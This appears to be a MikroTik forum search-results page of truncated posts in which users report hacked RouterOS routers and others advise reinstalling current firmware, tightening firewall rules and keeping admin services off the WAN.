Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

The CIA hacks many routers, incl. MikroTik routers. And: the CIA tools have been stolen and now blackhat hackers worldwide use them. Search for details of CVE-2018-14847 and CVE-2019-3943 S.a. https://wikileaks.org/ciav7p1/ https://forum.mikrotik.com/viewtopic.php?t=119308 https://forum.mikrotik.com...
by mutluit
Sun May 24, 2020 5:05 pm
Forum: Beginner Basics
Topic: A desperate cry for help.
Replies: 5
Views: 1315

Re: A desperate cry for help.

@PhilipParkes, can you also try the "Pro" version of that Nvidia device?
And: how fast is your WAN link?
And: since you say the error started only 4 days ago: maybe your device could have been hacked and something else is running in parallel... Check... :-)
by anav
Sun May 24, 2020 4:58 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

First thing you need to do is remove the MT from the internet connection. The next thing you need to do is NET REINSTALL with the latest firmware. So download the latest firmware from Mikrotik and then conduct the NETINSTALL process. Once done, then start from scratch to redo your network setup. If ...
by sindy
Sun May 24, 2020 4:57 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

It was running OS version v6.37.1 and current firmware was 3.29. ... How did this happen? ... However, keep in mind I had a strong password. A number of vulnerabilities, including ones allowing to break in without knowing the password, have been fixed since 6.37.1, so this is the most likely reason...
by bpwl
Sun May 24, 2020 4:55 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

RouterOS 6.37.1 is from Nov 2016, almost 4 years old. The Mikrotiks were hacked worldwide several times since then: https://www.bankinfosecurity.com/cryptominers-keep-hacking-unpatched-mikrotik-routers-a-11627 The hackers keep taking over unpatched Mikrotik routers. ...
by Defraged
Sun May 24, 2020 4:38 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Hello, today I noticed that my home router (RB962UiGS) was hacked. It was running OS version v6.37.1 and current firmware was 3.29. The hacker or whoever it was has created a script that is called "7wmp0b4s.rsc" and scheduled to run at every hour. ...
by pe1chl
Fri May 15, 2020 11:46 am
Forum: Announcements
Topic: v6.47beta [testing] is released!
Replies: 269
Views: 124077

Re: v6.47beta [testing] is released!

I think they are fiddling with the download server, the situation varies by the hour. Earlier today it showed the release notes for version 5.9 !
Maybe it was restored from a backup. Hopefully it wasn't hacked.
by amrobx
Wed May 13, 2020 4:15 pm
Forum: General
Topic: Winbox - router does not support secure connection
Replies: 4
Views: 1421

Re: Winbox - router does not support secure connection

I would try to do a netinstall and start from scratch. For some reason, I am thinking about a hacked router in this case. That’s what I was worried about too. Luckily it turned out to be stupidity on my part. I had a script that disabled the loopback interface, which ...
by rambi
Wed May 13, 2020 6:03 am
Forum: General
Topic: Reset sxtsq 5 ac issue - need help
Replies: 6
Views: 913

Re: Reset sxtsq 5 ac issue - need help

... all? I used netinstall on rb750 and haplite several times, all ok. but on this sxtsq, it's very confusing. I have all the tools, sir. my sxtsq was hacked by someone and the password has been changed. but when I try to reset, something like that happens. is there something wrong? or is there a special ...
by inteq
Tue May 12, 2020 11:13 pm
Forum: General
Topic: Winbox - router does not support secure connection
Replies: 4
Views: 1421

Re: Winbox - router does not support secure connection

I would try to do a netinstall and start from scratch.
For some reason, I am thinking about a hacked router in this case.
by looka
Mon May 04, 2020 12:32 am
Forum: Beginner Basics
Topic: multiple gateways & routing [SOLVED]
Replies: 18
Views: 3883

Re: multiple gateways & routing [SOLVED]

... s, which does not have fancy switch chip to help cpu. On the other hand, I was told it is nice to move server out of main network, as it can be hacked through services, running on it...
by mkx
Wed Apr 29, 2020 5:24 pm
Forum: General
Topic: PPPoE client connected but no internet [SOLVED]
Replies: 10
Views: 2753

Re: PPPoE client connected but no internet [SOLVED]

... dial-on-demand=no on pppoe-client configuration. And enable your last firewall rule (drop everything else), without it your router will get hacked within minutes after you establish internet connectivity. At the same time, add another rule similar to the last one, but using in-interface=pppoe-out1
by lexell
Thu Apr 23, 2020 12:24 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

The output of that print is completely empty (as expected - no one else has access to the router and I don't use the default config setup at all, I always do a reset to a blank no-config state and only configure the desired functionality from scratch). As do I, without fail, but not running the defau...
by Jotne
Thu Apr 23, 2020 8:41 am
Forum: General
Topic: Security: Address(es) of MikroTik update server(s) needed [SOLVED]
Replies: 10
Views: 2803

Re: Security: Address(es) of MikroTik update server(s) needed [SOLVED]

NSA backdoor, botnets, ransomware, bugs, ... I read in old news and postings that in 2017/2018 the NSA already had hacked the RouterOS --> just research yourself. Here are the statements of MikroTik dated 30th May, 2018 and later: https://blog.mikrotik.com/security/www-vulnerability.html ...
by macsrwe
Thu Apr 23, 2020 3:02 am
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

The output of that print is completely empty (as expected - no one else has access to the router and I don't use the default config setup at all, I always do a reset to a blank no-config state and only configure the desired functionality from scratch). As do I, without fail, but not running the defau...
by lexell
Thu Apr 23, 2020 1:57 am
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

My next suggestion was going to be for you to run /system default-configuration script print and peruse the output for matching strings, in case someone had established a non-standard default configuration on your router. But if mrz says this is a known bug, then it is. (I bet if you ran the comman...
by mutluit
Wed Apr 22, 2020 11:47 pm
Forum: General
Topic: Security: Address(es) of MikroTik update server(s) needed [SOLVED]
Replies: 10
Views: 2803

Re: Security: Address(es) of MikroTik update server(s) needed [SOLVED]

... to fetch html pages etc. NSA backdoor, botnets, ransomware, bugs, ... I read in old news and postings that in 2017/2018 the NSA already had hacked the RouterOS --> just research yourself. Here are the statements of MikroTik dated 30th May, 2018 and later: https://blog.mikrotik.com/security/www-vulnerability.html ...
by Maajed
Tue Apr 21, 2020 8:12 pm
Forum: Beginner Basics
Topic: Mikrotik login failure from haker outside
Replies: 6
Views: 1609

Re: Mikrotik login failure

No, not me, it looks like it's a hacked server attempt from outside
by pe1chl
Mon Apr 13, 2020 3:35 pm
Forum: Beginner Basics
Topic: Graphing issue
Replies: 8
Views: 1427

Re: Graphing issue

... in reaching the webfig or graphs. Either there is a config error in your firewall or IP services settings, or indeed the router already has been hacked by outsiders who have changed things to assure their access. When you want to access a router from outside (e.g. a remotely placed router where ...
by macsrwe
Sat Apr 11, 2020 3:03 am
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

My next suggestion was going to be for you to run /system default-configuration script print and peruse the output for matching strings, in case someone had established a non-standard default configuration on your router. But if mrz says this is a known bug, then it is. (I bet if you ran the command...
by lexell
Fri Apr 10, 2020 4:59 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Freshly rebooted and I have these environment variables. Any ideas what they are? They look like scripts? And some are quite long. If I delete them, they'll remain deleted until the next reboot. They are global functions . From the behavior you describe, your router executes a script on startup tha...
by macsrwe
Thu Apr 09, 2020 3:34 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Freshly rebooted and I have these environment variables. Any ideas what they are? They look like scripts? And some are quite long. If I delete them, they'll remain deleted until the next reboot. They are global functions . From the behavior you describe, your router executes a script on startup tha...
by lexell
Wed Apr 08, 2020 8:25 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Experiencing the same on a hAP ac for the past few stable releases incl. v6.46.5. Not happening on a hAP lite though (both always upgraded to the same version in parallel). Might be triggered by something in the configuration - hAP ac has a more complex config, some startup scripts and also a few mo...
by anav
Mon Mar 09, 2020 2:45 pm
Forum: General
Topic: Router is infection by virus coinhive
Replies: 8
Views: 9641

Re: Router is infection by virus coinhive

CZFAN, were the instructions ever to keep an old corrupted hacked config in place EVER? Does it even sound logical lol? C'mon, having an Alzheimer's moment or something?? It's not like you don't know how scripts work etc......... and you know how smart hackers ...
by ingdaka
Wed Feb 26, 2020 9:27 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

Like Strods wrote! This is an old script that is from old version of ROS. Also Do you use a master password for Winbox? If not then you should know that if you export addresses.wbx this is an unencrypted file that can be opened with notepad and to read all IP/username/passwords saved there!
by strods
Wed Feb 26, 2020 7:23 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

When was the last time you did change the password? Is it possible that it has not been changed since your router was running RouterOS v6.42 or an older version?
by joshuachaw
Wed Feb 26, 2020 6:35 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Mikrotik OS 6.45.6 Hacked

Just to share that yesterday we discovered one of the public facing mikrotik being hacked. We do not think password leaked and it should be via some vulnerability hack. Below are the details: Model : Routerboard 3011UiAS (CloudCore) OS version : 6.45.6 IP Services ...
by morheb
Sun Feb 16, 2020 6:31 pm
Forum: General
Topic: is my hotspot hacked??
Replies: 0
Views: 1528

is my hotspot hacked??

... I compared the mac addresses in wifi registration to the active users, the registered wifi users who has traffic are bot in the active tab Am I hacked? What can I do? Some users use the hotspot and vouchers, I tried to use internet without entering vouchers but I failed Help please
by Ixam
Wed Feb 12, 2020 10:39 am
Forum: General
Topic: ccr1036-8g-2s+EM prevent outgoing ddos
Replies: 0
Views: 1424

ccr1036-8g-2s+EM prevent outgoing ddos

... RouterOS and for example auto-null the Server that is doing it? Not talking about inbound, we are talking if OUTBOUND For example one server gets hacked and goes rogue or a rogue customer is doing that.
by r00t
Tue Feb 11, 2020 6:19 pm
Forum: General
Topic: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?
Replies: 7
Views: 3592

Re: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?

After reformatting NAND memory, your router can only be netinstalled, all normal OS have been wiped in the process. Look in the documentation for your hardware to see which port you can use to netinstall and use just direct cable from router to your PC, with fixed IP set in windows etc... entire proc...
by tachyonnoc
Tue Feb 11, 2020 1:11 pm
Forum: General
Topic: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?
Replies: 7
Views: 3592

Re: Mikrotik device has been hacked and the hack script disable many things. What should I do?

... This is what you need to do for your OTHER routers: https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router Hi Normis, My Hex Lite got hacked, now I'm facing the same situation as this thread, I tried to press the button for 5 min but now my hex is looking like it's bricked, what to do ...
by tachyonnoc
Tue Feb 11, 2020 1:10 pm
Forum: General
Topic: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?
Replies: 7
Views: 3592

Re: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?

Hi Normis, My Hex Lite got hacked, now I'm facing the same situation as this thread, I tried to press the button for 5 min but now my hex is looking like it's bricked,
what to do ??
Please help
by pe1chl
Tue Feb 04, 2020 12:23 pm
Forum: Beginner Basics
Topic: I need help setting up a RouterBoard hex with a Draytek Vigor 130
Replies: 16
Views: 2446

Re: I need help setting up a RouterBoard hex with a Draytek Vigor 130

The risk of a hacked router when using old firmware and no firewall or the default firewall of old firmware is quite real! In any case, go back to system->packages, select the "stable" channel and download&install 6.46.2 Then, reset ...
by mkx
Mon Feb 03, 2020 11:15 pm
Forum: Beginner Basics
Topic: I need help setting up a RouterBoard hex with a Draytek Vigor 130
Replies: 16
Views: 2446

Re: I need help setting up a RouterBoard hex with a Draytek Vigor 130

... is running very old, vulnerable ROS version router is running no firewall what so ever, making it open for any attacker ... and is bound to be hacked within minutes after it connects to internet I'm not very familiar with different quick-set modes so I can't suggest which one would be best ...
by mkx
Sat Jan 25, 2020 2:02 pm
Forum: General
Topic: IP from WAN subnet on port [SOLVED]
Replies: 3
Views: 697

Re: IP from WAN subnet on port [SOLVED]

... ROS (and routerboot) to some recent (either stable or "long term") version reset device to factory default disconnect device from WAN not to get hacked while you change things connect to device via ether2-4 using MAC connection (winbox) remove ether5 from bridge move LAN IP config from bridge ...
by msatter
Wed Jan 08, 2020 6:33 pm
Forum: General
Topic: [Interpol] Operation Goldfish Alpha
Replies: 0
Views: 1049

[Interpol] Operation Goldfish Alpha

... INTERPOL’s ASEAN Cyber Capability Desk launched Operation Goldfish Alpha in June 2019. At that time, intelligence identified more than 20,000 hacked routers in the region, accounting for 18 per cent of infections globally. With support from INTERPOL’s Cyber Foundation project, an operational ...
by aradicev
Fri Jan 03, 2020 8:23 pm
Forum: General
Topic: Cannot update RouterOS
Replies: 2
Views: 630

Re: Cannot update RouterOS

Fortunately my routers are not hacked. I have compared the current configuration with quite old backups and there are no suspicious changes. Also, I don't think that my ISP was responsible for this, it was rather a malicious attack undergoing. ...
by mkx
Fri Jan 03, 2020 12:41 pm
Forum: General
Topic: Cannot update RouterOS
Replies: 2
Views: 630

Re: Cannot update RouterOS

Either somebody hacked your routers or your ISP is redirecting http traffic. If routers are hacked, then careful config examination likely shows some config which shouldn't be there (proxy enabled, some scripts, DNS redirects, you ...
by Sob
Mon Dec 30, 2019 1:20 am
Forum: Beginner Basics
Topic: Opening 3 different WAN devices settings in browser/winbox ? [SOLVED]
Replies: 12
Views: 2457

Re: Opening 3 different WAN devices settings in browser/winbox ? [SOLVED]

It works, but everything else is still allowed. So for example if someone hacked your other routers/modems, they would be able to connect to any device in main LAN. It probably won't happen, so it should be ok. But it doesn't hurt to use more secure config.
by el berto
Mon Dec 09, 2019 1:15 pm
Forum: General
Topic: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?
Replies: 20
Views: 2507

Re: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?

a. Use netinstall to latest firmware if sense one is hacked So if RouterBoard has been hacked just rewriting firmware using netinstall will solve issue to have clean (not corrupted) firmware, right? I was using RB750 with an old release 6.22 or 6.30, ...
by xvo
Fri Nov 29, 2019 2:50 pm
Forum: General
Topic: Drop unwanted port-forwarding connections
Replies: 6
Views: 1241

Re: Drop unwanted port-forwarding connections

... If he is clever/brave/skilled enough to add a WAN interface but not enough add it to the interface list, everything works, but he is likely to get hacked, so he'll get mad about the router later, but more :) Exactly. And having default firewall to be what it is now, it seems that Mikrotik engineers ...
by sindy
Fri Nov 29, 2019 2:38 pm
Forum: General
Topic: Drop unwanted port-forwarding connections
Replies: 6
Views: 1241

Re: Drop unwanted port-forwarding connections

... If he is clever/brave/skilled enough to add a WAN interface but not enough add it to the interface list, everything works, but he is likely to get hacked, so he'll get mad about the router later, but more :)
by globusr
Tue Nov 26, 2019 4:36 pm
Forum: General
Topic: Can't open site from WiFi on hAP ac
Replies: 1
Views: 312

Can't open site from WiFi on hAP ac

... but just can't open site. No proxies, no specific settings. Please help what is my exam actions to re solve, I'm aware my Mikrotik became bot ... hacked. Thx,
by ksthree
Wed Nov 20, 2019 6:01 pm
Forum: General
Topic: Firewall killing NAT rule
Replies: 5
Views: 1008

Re: Firewall killing NAT rule

... such that it only allows you to log in via our Public IP or the respective RB's local IPs. We had a recent event where one of our main servers got hacked. So we ramped up security everywhere.
by anav
Wed Nov 20, 2019 3:11 pm
Forum: General
Topic: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?
Replies: 20
Views: 2507

Re: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?

... what I interpreted. Finally, it seems best practices still prevent problems, common sense!! a. Use netinstall to latest firmware if sense one is hacked Prevent a. by NOT opening winbox to the WAN side, use only VPN to access router externally Prevent a. by NOT allowing external access to DNS ...
by amojak
Wed Nov 20, 2019 12:28 pm
Forum: General
Topic: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?
Replies: 20
Views: 2507

Re: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?

... no static entries in the dns setup for our core router. our "ISP" is level 3/centurylink and i find it difficult to consider their DNS servers are hacked To add to this this is occurring on every other core MT router on other connections with other DNS servers too. So in summary it looks to be an ...
by Znevna
Wed Nov 20, 2019 10:45 am
Forum: General
Topic: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?
Replies: 20
Views: 2507

Re: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?

... you have nothing in static DNS regarding upgrade.mikrotik.com or download.mikrotik.com and you're using the ISP's DNS servers, well, your ISP is hacked. It might even force redirect all your queries. Too many options. You have to check which one is it, doing local queries using different servers ...
by r00t
Sat Nov 09, 2019 7:05 pm
Forum: General
Topic: RouterBoot does not accept any key
Replies: 6
Views: 1050

Re: RouterBoot does not accept any key

... supported by tools like OpenOCD, then find where in memory is the routerboot configuration (test it first on a working RB), then finally fix the hacked ones.... it's a lot of work, if you have 100 RB to fix, it may be worth it, but for one or two... probably not... To desolder and edit the NAND ...
by manusamir
Sat Nov 09, 2019 1:35 pm
Forum: General
Topic: RouterBoot does not accept any key
Replies: 6
Views: 1050

Re: RouterBoot does not accept any key

Ok, but the router is hacked (no my password and interfaces shutted down) ..I can't access to the routerboard so the only method to access is reset it with netinstall with serial cable but also this method is locked...Is there another method?


Very thanks
by mkx
Thu Nov 07, 2019 1:24 pm
Forum: Beginner Basics
Topic: Issue connecting to RB951 via Winbox - MAC works, IP does not
Replies: 4
Views: 960

Re: Issue connecting to RB951 via Winbox - MAC works, IP does not

There have been reports when ROS devices hacked have had installed some malware not exposed in any configuration (GUI, export, ...). So when it's proven that device was hacked, the most safe course of action would be: find last known good configuration ...
by rootwilliamson
Thu Nov 07, 2019 10:06 am
Forum: Useful user articles
Topic: Which VPN protocol is best?
Replies: 14
Views: 7691

Which VPN protocol is best?

... I use pptp protocol for streaming. On last weekend with my friends, I was using Facebook from my smartphone. In a while my smartphone is going hacked and all data that already stored in my phone was too. At that time, I said “What the fuck is this” but one of my friend suggest me to don’t use ...
by vader7071
Thu Nov 07, 2019 2:24 am
Forum: Beginner Basics
Topic: Issue connecting to RB951 via Winbox - MAC works, IP does not
Replies: 4
Views: 960

Re: Issue connecting to RB951 via Winbox - MAC works, IP does not

... However I found the line "set winbox" read as "set winbox disabled=yes". The more I dug, the more I found, and I think my setting may have been hacked. I re-enabled winbox and went in and undid what I found (socks had been turned on, and I had found a new user added, among other things). Luckily, ...
by msatter
Wed Nov 06, 2019 3:34 pm
Forum: General
Topic: NordVPN
Replies: 19
Views: 5350

Re: NordVPN

NordVPN was hacked recently. I have seen a lot of user accounts leaked on pastebins and forums. I would suggest users to stay away from that provider for a while
Information about this hack from the side of NordVPN:

https://nordvpn.com/blog/official-respo ... er-breach/
by shrekkd
Wed Nov 06, 2019 12:45 pm
Forum: General
Topic: NordVPN
Replies: 19
Views: 5350

Re: NordVPN

NordVPN was hacked recently. I have seen a lot of user accounts leaked on pastebins and forums. I would suggest users to stay away from that provider for a while
by tokunbo
Tue Nov 05, 2019 11:59 am
Forum: Beginner Basics
Topic: Router reset not working: couldnt reset configuration-not permitted(9)
Replies: 6
Views: 1330

Router reset not working: couldnt reset configuration-not permitted(9)

Hello sirs, I'm trying to recover a hacked MikroTik router. Here are my observations: 1) I can only login via Winbox >> neighbors..... as my normal user 'admin'...in the "write" group 2) Via winbox >> terminal, the welcome screen shows 'Device ...
by Dmurr
Mon Nov 04, 2019 3:18 pm
Forum: General
Topic: flash hack mikrotik
Replies: 4
Views: 920

flash hack mikrotik

... In the Windows settings 10.10.10.10/24, in the netinstall settings - net booting - Boot server enabled 10.10.10.11. How do I reflash clean firmware? Hacked 2011. The provider receives arp requests to the network. 6.40.5 I try to fill in the new firmware 6.45.7, but the router does not want to be ...
by manusamir
Sat Nov 02, 2019 5:05 pm
Forum: General
Topic: RouterBoot does not accept any key
Replies: 6
Views: 1050

RouterBoot does not accept any key

Hi all, My question is about RouterBoot booter 6.43.16 of a hacked rb2011. I connected with serial cable my RB2011 and I want to install RouterOs from Netinstall but I got problem because no keys are accepted..in my case is "o - boot device". Any key ...
by pe1chl
Fri Nov 01, 2019 5:55 pm
Forum: General
Topic: Configuration not saved, or reverted
Replies: 3
Views: 902

Re: Configuration not saved, or reverted

... nice, sometimes not so nice...) When there are config changes that you did not make yourself, consider the possibility that the device was hacked. When it has winbox open to everyone on internet, that is quite likely to happen (especially when you did not keep it uptodate).
by CZFan
Thu Oct 17, 2019 7:29 pm
Forum: General
Topic: Is there an new exploit going around?
Replies: 57
Views: 14576

Re: Is there an new exploit going around?

This topic so far: "I heard somebody got hacked"; "Me too"; "I have no firewall and use admin user". So please: - Use latest version (at least "long-term") - If you upgraded from a vulnerable older version, make a new user and new password, delete ...
by normis
Thu Oct 17, 2019 4:34 pm
Forum: General
Topic: Is there an new exploit going around?
Replies: 57
Views: 14576

Re: Is there an new exploit going around?

This topic so far: "I heard somebody got hacked"; "Me too"; "I have no firewall and use admin user". So please: - Use latest version (at least "long-term") - If you upgraded from a vulnerable older version, make a new user and new password, delete ...
by Exiver
Thu Oct 17, 2019 4:10 pm
Forum: General
Topic: Is there an new exploit going around?
Replies: 57
Views: 14576

Re: Is there an new exploit going around?

... is disabled except SSH. Leads me to the conclusion that there is either an exploit for any other service (winbox, api?) or the admins got hacked and credentials were stolen from their machines..
by cecconet
Thu Oct 17, 2019 10:24 am
Forum: General
Topic: Is there an new exploit going around?
Replies: 57
Views: 14576

Re: Is there an new exploit going around?

I can confirm, same here. Luckily, we got only about 10 mikrotik hacked. I think in at one case the use api port 8728. We have various firmware versions. The last year has been very tough with a lot of exploits for Mikrotik routeros. It's because mikrotik ...
by mkx
Thu Oct 10, 2019 3:40 pm
Forum: Beginner Basics
Topic: DDNS does not let me access my Router [SOLVED]
Replies: 15
Views: 3513

Re: DDNS does not let me access my Router [SOLVED]

... able to do so from internet, it's clear that your ISP is doing some firewalling (and it seems to be a good thing, otherwise your router would be hacked by now). Before you get ISP to release firewall rules on your WAN IP, I suggest you to get some good firewall up & running. You should probably ...
by sindy
Wed Oct 09, 2019 10:39 pm
Forum: General
Topic: Microtik router with existing network
Replies: 64
Views: 8570

Re: Microtik router with existing network

... need to be accessible from outside. If they were accessible from the internet for some time, there is no guarantee that the machine has not been hacked during that time. So the only way to make sure that the machine is safe is to disconnect it from the internet, export the current configuration ...
by Michaelcrapse
Wed Oct 09, 2019 6:58 pm
Forum: RouterBOARD hardware
Topic: 100 % CPU on some Routerboards
Replies: 9
Views: 3347

Re: 100 % CPU on some Routerboards

... of the /export that you first have examined for any strange things. When there is old firmware on it and it misbehaves, it most likely has been hacked and there now is malware running on it. Yes, just tried this now. Issue seems to persist. These units were definitely not hacked. No possible ...
by pe1chl
Tue Oct 08, 2019 11:49 pm
Forum: RouterBOARD hardware
Topic: 100 % CPU on some Routerboards
Replies: 9
Views: 3347

Re: 100 % CPU on some Routerboards

... of the /export that you first have examined for any strange things. When there is old firmware on it and it misbehaves, it most likely has been hacked and there now is malware running on it.
by nozz
Tue Sep 24, 2019 3:28 pm
Forum: RouterBOARD hardware
Topic: CRS125-24G-1S-RM brick
Replies: 9
Views: 2180

CRS125-24G-1S-RM brick

Hello. The device was hacked by a known vulnerability. The admin was given - read, the new admin full. Protected bootloader is set and reformat-hold-button - 4:59. After resetting by reset, fell into a cyclic reboot at the loading kernel ...
by electravis
Thu Sep 12, 2019 6:20 pm
Forum: General
Topic: Hacked router Possible password
Replies: 0
Views: 880

Hacked router Possible password

So I thought maybe this will help someone else who may have got hacked and didn't find it yet. Came across one router that was hacked had no way to get to it to reset it. Luckily I have it email me backup configs so after lots of searching and trial and error, ...
by Jotne
Tue Sep 03, 2019 10:53 pm
Forum: Beginner Basics
Topic: Can Routers Get Infected?
Replies: 5
Views: 1429

Re: Can Routers Get Infected?

What router do you have, and what firmware are you on?
Old firmware have been hacked.
by CZFan
Thu Aug 08, 2019 1:00 am
Forum: General
Topic: RB951G-2HnD dissapears
Replies: 4
Views: 799

Re: RB951G-2HnD dissapears

I suspect these devices were hacked, hence going offline due to the very old version.

My suggestion will be to build an L2 link to the CRS, then connect these faulty ones to the CRS and do a netinstall across the L2 link
by CrimzinZA
Fri Aug 02, 2019 11:47 am
Forum: General
Topic: Is there a Firmware versions vulnerability list
Replies: 1
Views: 685

Is there a Firmware versions vulnerability list

... are vulnerable and which for "now" are not. I see some older firmware on some devices like 6.35.4 and I personally know a third party that was hacked but not sure which firmware they ran. Obviously after that they upgraded, that sorted them out. Is there a list somewhere? Obviously if something ...
by R1CH
Thu Aug 01, 2019 12:15 pm
Forum: General
Topic: Winbox login: authentication failed, maybe due to bad blocks?
Replies: 5
Views: 925

Re: Winbox login: authentication failed, maybe due to bad blocks?

6.19 is very old and the device is likely hacked, you should netinstall a secure version.
by anav
Wed Jul 31, 2019 6:01 pm
Forum: General
Topic: port forwarding Source DDNS [SOLVED]
Replies: 18
Views: 2523

Re: port forwarding Source DDNS [SOLVED]

... I would be really keen on better security. If the logging information was valuable ditto (in other words, I don't get paid because the logs were hacked and don't exist I would be really keen on better security) If the devices themselves and the information were hacked and destroyed, how long would ...
by pe1chl
Sat Jul 27, 2019 9:08 am
Forum: Beginner Basics
Topic: Permit Winbox
Replies: 11
Views: 1964

Re: Permit Winbox

... several problems with Winbox security in the recent past, and people that have done what was described here have found that their routers were hacked. MikroTik thinks that the current version is no longer vulnerable to such attacks, but so they did for previous versions and there were some ...
by mkx
Sat Jul 13, 2019 1:45 pm
Forum: Beginner Basics
Topic: RouterOS v6.41.4 access to admin panel -password problem [SOLVED]
Replies: 9
Views: 2341

Re: RouterOS v6.41.4 access to admin panel -password problem [SOLVED]

... want to, go ahead, I'm not going to try to stop you. Actually that might be a good idea, there are some device states (mainly after they've been hacked) from which it's only possible to recover by netinstalling the device.
by arielgrin
Wed Jul 10, 2019 10:49 pm
Forum: General
Topic: Very high sector writes
Replies: 26
Views: 3108

Re: Very high sector writes

I don't see how could it get hacked. There are no open ports nor forwarded ports on the wan interface. None of the admin tools, like webfig or ssh are open to the exterior. The only one using the router is me.
by vgdorneles
Mon Jul 08, 2019 9:44 pm
Forum: General
Topic: [Feature Request] Switch-cpu as a romon port and Comment for switch rules
Replies: 0
Views: 642

[Feature Request] Switch-cpu as a romon port and Comment for switch rules

... "all" ports). The second request is to be able to add comments to Switch Rules. Some switches mine already have more than 30 rules, and I have to hacked my brain trying to understand them every time I have to modify something.
by sid5632
Mon Jul 08, 2019 7:08 pm
Forum: General
Topic: Very high sector writes
Replies: 26
Views: 3108

Re: Very high sector writes

Yes, hacked.
by arielgrin
Mon Jul 08, 2019 3:37 pm
Forum: General
Topic: Very high sector writes
Replies: 26
Views: 3108

Re: Very high sector writes

Will try netinstall and report. Just curious, compromised how? Do you mean hacked? Or something else?
by anav
Wed Jul 03, 2019 8:31 pm
Forum: Beginner Basics
Topic: Help needed with config
Replies: 9
Views: 1276

Re: Help needed with config

This is not a factory refresh, where are all the default firewall rules??
I hope you realize that the default rules are there to protect your router from being hacked!!
by mkx
Wed Jul 03, 2019 4:58 pm
Forum: Beginner Basics
Topic: Guest wifi on multiple APs
Replies: 9
Views: 2394

Re: Guest wifi on multiple APs

If the published config for your router is complete, then your router is probably already hacked because you don't have any firewall protection. I suggest you to start from default firewall filter list, it is a decent starting point. Anyhow, MT routers perform two (very) ...
by rjscomms
Fri Jun 21, 2019 3:04 am
Forum: Scripting
Topic: script that sends an email if the temperature of the Mikrotik router gets too high
Replies: 2
Views: 1344

Re: script that sends an email if the temperature of the Mikrotik router gets too high

Hello, this is what I use at the moment. It is hacked from someone else 8-} :log info ("$[/system health get temperature] $[/system health get voltage]") :if ([/system health get temperature]>45) do={/tool e-mail send to="me@somewhere.net" subject=[/system ...
by krafg
Sat Jun 15, 2019 7:56 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

To not get anymore these logs, go to IP -> Services and limit the access to local network or disable that you don't need.

Regards.
by Pea
Sat Jun 15, 2019 2:58 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

Why do you think someone hacked in?
Your log shows only failed logins due to your poor firewall. You should rethink your firewall and running services.
by darkuek
Sat Jun 15, 2019 2:34 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

... first we don't know what firmware he had to begin with so it's an assumption not fact if his firmware is or is not up to date. Secondly, if there is hacked firmware the only 'safe' method for an update or reset is to download a clean copy of the latest firmware and apply it via netinstall!! As to ...
by darkuek
Sat Jun 15, 2019 2:31 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

... first we don't know what firmware he had to begin with so it's an assumption not fact if his firmware is or is not up to date. Secondly, if there is hacked firmware the only 'safe' method for an update or reset is to download a clean copy of the latest firmware and apply it via netinstall!! As to ...
by Javadeb
Fri Jun 14, 2019 7:50 am
Forum: RouterBOARD hardware
Topic: crs 326 24g 2s hard reset not working
Replies: 1
Views: 789

crs 326 24g 2s hard reset not working

Hi All
